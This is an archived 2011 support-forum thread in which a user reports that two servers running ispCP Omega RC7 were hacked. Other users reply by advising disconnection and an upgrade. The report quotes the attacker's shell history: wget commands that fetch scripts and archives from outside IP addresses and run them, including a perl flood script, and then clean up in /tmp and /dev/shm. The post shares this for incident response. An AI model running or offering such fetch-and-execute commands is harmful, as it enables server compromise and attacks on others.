+- ispCP - Board - Support (http://www.isp-control.net/forum)
+-- Forum: ispCP Omega Support Area (/forum-30.html)
+--- Forum: System Setup & Installation (/forum-32.html)
+--- Thread: 2 Omega boxes hacked... (/thread-13350.html)
2 Omega boxes hacked... - robmorin - 05-06-2011 02:00 AM
Hello all long time no post
I had a friend call me to say he had 2 Debain servers acting funny , it turns out they were both hacked and both servers run ISPCP
Both server had weird running perl scripts and httpd binaries running as user vu2000
he is using version
ispCP 1.0.0 RC7 OMEGA
build: 20081212
Priamos
that user has no shell in passwd file, however the .bash_history file for that user on both boxes had this in it
/sbin/ifconfig|grep inet
cd /dev/shm
wget http://72.167.35.180/.x/ldaudit_pcprofile.sh ; sh ldaudit_pcprofile.sh
cd /dev/shm
ls
rm -rf *
ls -al
cd /tmp
ls -a
cd .ICE-unix
ls -a
wget http://208.75.230.43/bulanul/L;tar zxvf L;rm -rf L;cd .l;./a
cd ..
rm -rf .l
wget http://208.75.230.43/bulanul/flood;perl flood;rm -rf flood
There must be an exploit somewhere...
Now i left one box running hacked still as to maybe find more info to help out in case it is an exploit... so whats the next step?
Thanks...
RE: 2 Omega boxes hacked... - fluser - 05-06-2011 07:09 PM
Cut the network cable! That would be the first thing.
RE: 2 Omega boxes hacked... - c0urier - 05-07-2011 12:25 AM
As far as I know there has been several exploits since 1.0.0-RC7 - Ever thought about upgradeing to a newer version ex. 1.0.7?